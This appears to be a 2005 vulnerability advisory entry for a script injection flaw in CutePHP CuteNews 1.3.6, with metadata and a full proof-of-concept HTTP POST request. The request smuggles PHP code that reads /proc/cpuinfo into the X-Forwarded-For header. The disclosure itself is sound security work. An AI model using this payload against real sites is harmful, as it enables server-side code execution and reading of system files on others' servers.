exploits , vulnerabilities , articles , CutePHP CuteNews X-Forwarded-For Script Injection Vulnerability

Title	CutePHP CuteNews X-Forwarded-For Script Injection Vulnerability
Published	2005-03-01-12:00AM
Updated	2005-03-01-05:35PM
Class	Input Validation Error
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	FraMe <frame@kernelpanik.org> is credited with the discovery of this issue.
Vulnerable	CutePHP CuteNews 1.3.6
Not Vulnerable
Code	No exploit is required to leverage this issue. The following proof of concept has been provided to facilitate server-side script execution and must be invoked locally: POST http://localhost/cutenews/show_news.php?subaction=showcomments&id=1108372700&archive=&start_from=&ucat= HTTP/1.1 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,/;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Host: localhost Referer: http://localhost/cutenews/show_news.php?subaction=showcomments&id=1108372700&archive=&start_from=&ucat= User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041111 Firefox/1.0 Content-Length: 124 Content-Type: application/x-www-form-urlencoded Keep-Alive: 300 X-FORWARDED-FOR: <?include("/proc/cpuinfo");?> name=proof+of+concept&mail=&comments=proof+of+concept&submit=Add+My+Comment&subaction=addcomment&ucat=&show=&cutepath=/parla
TXT